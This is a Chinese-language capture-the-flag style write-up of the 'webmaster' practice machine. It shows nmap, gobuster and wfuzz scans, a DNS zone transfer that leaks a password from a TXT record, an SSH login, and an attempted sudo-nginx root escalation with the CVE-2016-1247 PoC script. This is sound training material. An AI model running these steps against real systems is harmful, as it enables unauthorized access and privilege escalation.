OSCP 靶场
靶场介绍
webmaster |
easy |
DNS服务利用、sudo-nginx 提权 |
信息收集
主机发现
nmap -sn 192.168.1.0/24
端口扫描
┌──(root㉿kali)-[~]
└─# nmap -sV -A -p- -T4 192.168.1.131
Starting Nmap 7.94 ( https://nmap.org ) at 2024-02-18 03:29 EST
Nmap scan report for 192.168.1.131
Host is up (0.00058s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 6d:7e:d2:d5:d0:45:36:d7:c9:ed:3e:1d:5c:86:fb:e4 (RSA)
| 256 04:9d:9a:de:af:31:33:1c:7c:24:4a:97:38:76:f5:f7 (ECDSA)
|_ 256 b0:8c:ed:ea:13:0f:03:2a:f3:60:8a:c3:ba:68:4a:be (ED25519)
53/tcp open domain (unknown banner: not currently available)
| fingerprint-strings:
| DNSVersionBindReqTCP:
| version
| bind
|_ currently available
| dns-nsid:
|_ bind.version: not currently available
80/tcp open http nginx 1.14.2
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.14.2
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port53-TCP:V=7.94%I=7%D=2/18%Time=65D1C00A%P=x86_64-pc-linux-gnu%r(DNSV
SF:ersionBindReqTCP,52,"�P�x06x85��x01�x01�x01��x07versionx
SF:04bind��x10�x03xc0x0c�x10�x03�����x18x17notx20curren
SF:tlyx20availablexc0x0c�x02�x03�����x02xc0x0c");
MAC Address: 08:00:27:3F:B8:3D (Oracle VirtualBox virtual NIC)
Device type: general purpose
Running: Linux 4.X|5.X
OS CPE: cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:5
OS details: Linux 4.15 - 5.8
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
目录扫描
添加dns,扫描目录
┌──(root㉿kali)-[~]
└─# vim /etc/hosts
┌──(root㉿kali)-[~]
└─# gobuster dir -w /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -u http://webmaster.hmv -x html,php,txt -e
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://webmaster.hmv
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /opt/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.6
[+] Extensions: html,php,txt
[+] Expanded: true
[+] Timeout: 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
http://webmaster.hmv/index.html (Status: 200) [Size: 57]
Progress: 882240 / 882244 (100.00%)
===============================================================
Finished
子域名扫描
┌──(root㉿kali)-[~]
└─# wfuzz -u 'http://webmaster.hmv' -H 'Host: FUZZ.webmaster.hmv' -t 100 -w /opt/SecLists/Discovery/DNS/subdomains-top1million-110000.txt --hh 57
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
/usr/local/lib/python3.11/dist-packages/requests/__init__.py:102: RequestsDependencyWarning:urllib3 (1.25.8) or chardet (5.0.0)/charset_normalizer (2.0.7) doesn't match a supported version!
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://webmaster.hmv/
Total requests: 114441
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
Total time: 0
Processed Requests: 114441
Filtered Requests: 114441
Requests/sec.: 0
探测DNS服务
┌──(root㉿kali)-[~]
└─# dig axfr @192.168.1.131 webmaster.hmv
; <<>> DiG 9.18.16-1-Debian <<>> axfr @192.168.1.131 webmaster.hmv
; (1 server found)
;; global options: +cmd
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
webmaster.hmv. 604800 IN NS ns1.webmaster.hmv.
ftp.webmaster.hmv. 604800 IN CNAME www.webmaster.hmv.
john.webmaster.hmv. 604800 IN TXT "Myhiddenpazzword"
mail.webmaster.hmv. 604800 IN A 192.168.0.12
ns1.webmaster.hmv. 604800 IN A 127.0.0.1
www.webmaster.hmv. 604800 IN A 192.168.0.11
webmaster.hmv. 604800 IN SOA ns1.webmaster.hmv. root.webmaster.hmv. 2 604800 86400 2419200 604800
;; Query time: 0 msec
;; SERVER: 192.168.1.131#53(192.168.1.131) (TCP)
;; WHEN: Sun Feb 18 03:49:51 EST 2024
;; XFR size: 8 records (messages 1, bytes 274)
权限获取
尝试使用dns 探测的字符串进行ssh 登录,成功获取权限
权限提升
john@webmaster:/home$ sudo -l
Matching Defaults entries for john on webmaster:
env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
User john may run the following commands on webmaster:
(ALL : ALL) NOPASSWD: /usr/sbin/nginx
尝试使用nginx 本地提权漏洞exp
john@webmaster:/var/www/html$ find / -name error.log 2>/dev/null
/var/log/nginx/error.log
john@webmaster:/var/www/html$ cd /tmp
john@webmaster:/tmp$ ls
40768.sh systemd-private-1c3a990ff89c4c06871c36a7516e4680-systemd-timesyncd.service-CJcxvG
john@webmaster:/tmp$ ./40768.sh /var/log/nginx/error.log
_______________________________
< Is your server (N)jinxed ? ;o >
-------------------------------
__---__
_- /--______
__--( / )XXXXXXXXXXXv.
.-XXX( O O )XXXXXXXXXXXXXXX-
/XXX( U ) XXXXXXX /XXXXX( )--_ XXXXXXXXXXX /XXXXX/ ( O ) XXXXXX XXXXX XXXXX/ / XXXXXX __ XXXXX
XXXXXX__/ XXXXXX __---->
---___ XXX__/ XXXXXX __ /
- --__/ ___/ XXXXXX / ___--/=
- ___/ XXXXXX '--- XXXXXX
-/XXX XXXXXX /XXXXX
XXXXXXXXX /XXXXX/
XXXXXX > _/XXXXX/
XXXXX--__/ __-- XXXX/
-XXXXXXXX--------------- XXXXXX-
XXXXXXXXXXXXXXXXXXXXXXXXXX/
""VXXXXXXXXXXXXXXXXXXV""
Nginx (Debian-based distros) - Root Privilege Escalation PoC Exploit (CVE-2016-1247)
nginxed-root.sh (ver. 1.0)
Discovered and coded by:
Dawid Golunski
https://legalhackers.com
[+] Starting the exploit as:
uid=1000(john) gid=1000(john) groups=1000(john),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)
[!] You need to execute the exploit as www-data user! Exiting.
因为需要www-data 用户执行该脚本,所以我们还需要获取www-data 权限
参考链接:https://icepng.github.io/2017/05/15/CVE-2016-1247/
本来想写入webshell 获取www-data 权限再执行脚本的,写入后发现直接是root 权限了。
原文始发于微信公众号(贝雷帽SEC):【OSCP】webmaster
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论